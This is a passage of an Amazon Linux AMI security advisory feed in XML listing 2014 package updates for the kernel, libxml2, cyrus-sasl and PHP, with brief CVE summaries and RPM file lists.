</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4122" title="" id="CVE-2013-4122" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cyrus-sasl-ntlm" version="2.1.23" release="13.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-sasl-ntlm-2.1.23-13.14.amzn1.x86_64.rpm</filename></package><package name="cyrus-sasl-ldap" version="2.1.23" release="13.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-sasl-ldap-2.1.23-13.14.amzn1.x86_64.rpm</filename></package><package name="cyrus-sasl-debuginfo" version="2.1.23" release="13.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-sasl-debuginfo-2.1.23-13.14.amzn1.x86_64.rpm</filename></package><package name="cyrus-sasl-sql" version="2.1.23" release="13.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-sasl-sql-2.1.23-13.14.amzn1.x86_64.rpm</filename></package><package name="cyrus-sasl-devel" version="2.1.23" release="13.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-sasl-devel-2.1.23-13.14.amzn1.x86_64.rpm</filename></package><package name="cyrus-sasl-lib" version="2.1.23" release="13.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-sasl-lib-2.1.23-13.14.amzn1.x86_64.rpm</filename></package><package name="cyrus-sasl-plain" version="2.1.23" release="13.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-sasl-plain-2.1.23-13.14.amzn1.x86_64.rpm</filename></package><package name="cyrus-sasl-gssapi" version="2.1.23" release="13.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-sasl-gssapi-2.1.23-13.14.amzn1.x86_64.rpm</filename></package><package name="cyrus-sasl-md5" version="2.1.23" release="13.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-sasl-md5-2.1.23-13.14.amzn1.x86_64.rpm</filename></package><package name="cyrus-sasl" version="2.1.23" release="13.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-sasl-2.1.23-13.14.amzn1.x86_64.rpm</filename></package><package name="cyrus-sasl-ldap" version="2.1.23" release="13.14.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-sasl-ldap-2.1.23-13.14.amzn1.i686.rpm</filename></package><package name="cyrus-sasl-ntlm" version="2.1.23" release="13.14.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-sasl-ntlm-2.1.23-13.14.amzn1.i686.rpm</filename></package><package name="cyrus-sasl-debuginfo" version="2.1.23" release="13.14.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-sasl-debuginfo-2.1.23-13.14.amzn1.i686.rpm</filename></package><package name="cyrus-sasl-sql" version="2.1.23" release="13.14.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-sasl-sql-2.1.23-13.14.amzn1.i686.rpm</filename></package><package name="cyrus-sasl-lib" version="2.1.23" release="13.14.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-sasl-lib-2.1.23-13.14.amzn1.i686.rpm</filename></package><package name="cyrus-sasl-plain" version="2.1.23" release="13.14.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-sasl-plain-2.1.23-13.14.amzn1.i686.rpm</filename></package><package name="cyrus-sasl-devel" version="2.1.23" release="13.14.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-sasl-devel-2.1.23-13.14.amzn1.i686.rpm</filename></package><package name="cyrus-sasl-gssapi" version="2.1.23" release="13.14.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-sasl-gssapi-2.1.23-13.14.amzn1.i686.rpm</filename></package><package name="cyrus-sasl" version="2.1.23" release="13.14.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-sasl-2.1.23-13.14.amzn1.i686.rpm</filename></package><package name="cyrus-sasl-md5" version="2.1.23" release="13.14.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-sasl-md5-2.1.23-13.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-339</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-339: medium priority package update for kernel</title><issued date="2014-05-13 16:40:00" /><updated date="2014-09-18 00:34:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0196:
The n_tty_write function in drivers/tty/n_tty.c in the Linux kernel through 3.14.3 does not properly manage tty driver access in the "LECHO & !OPOST" case, which allows local users to cause a denial of service (memory corruption and system crash) or gain privileges by triggering a race condition involving read and write operations with long strings.
1094232:
CVE-2014-0196 kernel: pty layer race condition leading to memory corruption
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0196" title="" id="CVE-2014-0196" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf" version="3.10.40" release="50.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-3.10.40-50.136.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.10.40" release="50.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.10.40-50.136.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.10.40" release="50.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.10.40-50.136.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.10.40" release="50.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.10.40-50.136.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.10.40" release="50.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.10.40-50.136.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.10.40" release="50.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.10.40-50.136.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="3.10.40" release="50.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-3.10.40-50.136.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="3.10.40" release="50.136.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-3.10.40-50.136.amzn1.i686.rpm</filename></package><package name="perf" version="3.10.40" release="50.136.amzn1" epoch="0" arch="i686"><filename>Packages/perf-3.10.40-50.136.amzn1.i686.rpm</filename></package><package name="kernel" version="3.10.40" release="50.136.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.10.40-50.136.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.10.40" release="50.136.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.10.40-50.136.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.10.40" release="50.136.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.10.40-50.136.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.10.40" release="50.136.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.10.40-50.136.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.10.40" release="50.136.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.10.40-50.136.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="3.10.40" release="50.136.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.10.40-50.136.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-340</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-340: low priority package update for libxml2</title><issued date="2014-05-21 10:29:00" /><updated date="2014-09-18 00:35:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2877:
parser.c in libxml2 before 2.9.0, as used in Google Chrome before 28.0.1500.71 and other products, allows remote attackers to cause a denial of service (out-of-bounds read) via a document that ends abruptly, related to the lack of certain checks for the XML_PARSER_EOF state.
983204:
CVE-2013-2877 libxml2: Out-of-bounds read via a document that ends abruptly
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2877" title="" id="CVE-2013-2877" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libxml2-devel" version="2.9.1" release="1.1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-devel-2.9.1-1.1.27.amzn1.x86_64.rpm</filename></package><package name="libxml2-python" version="2.9.1" release="1.1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python-2.9.1-1.1.27.amzn1.x86_64.rpm</filename></package><package name="libxml2-static" version="2.9.1" release="1.1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-static-2.9.1-1.1.27.amzn1.x86_64.rpm</filename></package><package name="libxml2-debuginfo" version="2.9.1" release="1.1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-debuginfo-2.9.1-1.1.27.amzn1.x86_64.rpm</filename></package><package name="libxml2" version="2.9.1" release="1.1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-2.9.1-1.1.27.amzn1.x86_64.rpm</filename></package><package name="libxml2" version="2.9.1" release="1.1.27.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-2.9.1-1.1.27.amzn1.i686.rpm</filename></package><package name="libxml2-static" version="2.9.1" release="1.1.27.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-static-2.9.1-1.1.27.amzn1.i686.rpm</filename></package><package name="libxml2-devel" version="2.9.1" release="1.1.27.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-devel-2.9.1-1.1.27.amzn1.i686.rpm</filename></package><package name="libxml2-python" version="2.9.1" release="1.1.27.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python-2.9.1-1.1.27.amzn1.i686.rpm</filename></package><package name="libxml2-debuginfo" version="2.9.1" release="1.1.27.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-debuginfo-2.9.1-1.1.27.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-341</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-341: medium priority package update for libxml2</title><issued date="2014-05-21 10:31:00" /><updated date="2014-09-18 00:35:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0191:
1090976:
CVE-2014-0191 libxml2: external parameter entity loaded when entity substitution is disabled
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0191" title="" id="CVE-2014-0191" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libxml2-debuginfo" version="2.9.1" release="1.1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-debuginfo-2.9.1-1.1.30.amzn1.x86_64.rpm</filename></package><package name="libxml2-devel" version="2.9.1" release="1.1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-devel-2.9.1-1.1.30.amzn1.x86_64.rpm</filename></package><package name="libxml2-static" version="2.9.1" release="1.1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-static-2.9.1-1.1.30.amzn1.x86_64.rpm</filename></package><package name="libxml2" version="2.9.1" release="1.1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-2.9.1-1.1.30.amzn1.x86_64.rpm</filename></package><package name="libxml2-python" version="2.9.1" release="1.1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python-2.9.1-1.1.30.amzn1.x86_64.rpm</filename></package><package name="libxml2-debuginfo" version="2.9.1" release="1.1.30.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-debuginfo-2.9.1-1.1.30.amzn1.i686.rpm</filename></package><package name="libxml2-python" version="2.9.1" release="1.1.30.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python-2.9.1-1.1.30.amzn1.i686.rpm</filename></package><package name="libxml2" version="2.9.1" release="1.1.30.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-2.9.1-1.1.30.amzn1.i686.rpm</filename></package><package name="libxml2-devel" version="2.9.1" release="1.1.30.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-devel-2.9.1-1.1.30.amzn1.i686.rpm</filename></package><package name="libxml2-static" version="2.9.1" release="1.1.30.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-static-2.9.1-1.1.30.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-342</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-342: medium priority package update for php55</title><issued date="2014-05-21 10:40:00" /><updated date="2014-09-18 00:35:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-7345:
The BEGIN regular expression in the awk script detector in magic/Magdir/commands in file before 5.15 uses multiple wildcards with unlimited repetitions, which allows context-dependent attackers to cause a denial of service (CPU consumption) via a crafted ASCII file that triggers a large amount of backtracking, as demonstrated via a file with many newline characters.
1079846:
CVE-2013-7345 file: extensive backtracking in awk rule regular expression
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7345" title="" id="CVE-2013-7345" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php55-mbstring" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mbstring-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-intl" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-intl-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-dba" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-dba-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-xml" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xml-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-odbc" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-odbc-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-common" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-common-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-xmlrpc" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xmlrpc-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-pdo" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pdo-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-tidy" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-tidy-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-opcache" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-opcache-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-mysqlnd" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mysqlnd-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-pgsql" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pgsql-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-fpm" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-fpm-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-embedded-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-recode" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-recode-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-pspell" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pspell-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-snmp" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-snmp-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-imap" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-imap-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-gmp" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gmp-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-mssql" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mssql-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-soap" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-soap-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-process" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-process-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-bcmath" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-bcmath-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-enchant" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-enchant-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-devel" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-devel-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-debuginfo" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-debuginfo-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-mcrypt" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mcrypt-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-gd" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gd-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-cli" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-cli-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-ldap" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-ldap-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-recode" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-recode-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-xml" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xml-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-gmp" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gmp-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-tidy" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-tidy-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-cli" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-cli-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-process" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-process-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-pgsql" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pgsql-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-devel" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-devel-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-snmp" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-snmp-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-ldap" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-ldap-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-soap" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-soap-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-xmlrpc" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xmlrpc-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-gd" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gd-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-debuginfo" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-debuginfo-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-fpm" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-fpm-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-enchant" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-enchant-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-common" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-common-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-mcrypt" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mcrypt-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-opcache" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-opcache-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-odbc" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-odbc-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-intl" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-intl-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-dba" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-dba-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-mysqlnd" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mysqlnd-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-imap" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-imap-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-pspell" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pspell-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-mbstring" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mbstring-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-bcmath" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-bcmath-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-pdo" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pdo-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-embedded" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-embedded-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-mssql" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mssql-5.5.12-1.71.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-343</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-343: medium priority package update for php54</title><issued date="2014-05-21 10:40:00" /><updated date="2014-09-18 00:36:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-7345:
The BEGIN regular expression in the awk script detector in magic/Magdir/commands in file before 5.15 uses multiple wildcards with unlimited repetitions, which allows context-dependent attackers to cause a denial of service (CPU consumption) via a crafted ASCII file that triggers a large amount of backtracking, as demonstrated via a file with many newline characters.
1079846:
CVE-2013-7345 file: extensive backtracking in awk rule regular expression
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7345" title="" id="CVE-2013-7345" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php54-mbstring" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mbstring-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-odbc" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-odbc-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-mysql" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysql-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-xmlrpc" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xmlrpc-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-mcrypt" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mcrypt-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-pspell" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pspell-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-pgsql" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pgsql-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-xml" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xml-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-recode" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-recode-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-imap" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-imap-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-process" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-process-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-tidy" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-tidy-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-intl" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-intl-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-snmp" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-snmp-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-gd" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-gd-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-enchant" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-enchant-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-dba" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-dba-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-mysqlnd" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysqlnd-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-bcmath" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-bcmath-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-embedded" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-embedded-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-pdo" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pdo-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-fpm" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-fpm-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-debuginfo" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-debuginfo-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-mssql" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mssql-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-ldap" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-ldap-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-soap" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-soap-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-devel" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-devel-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package 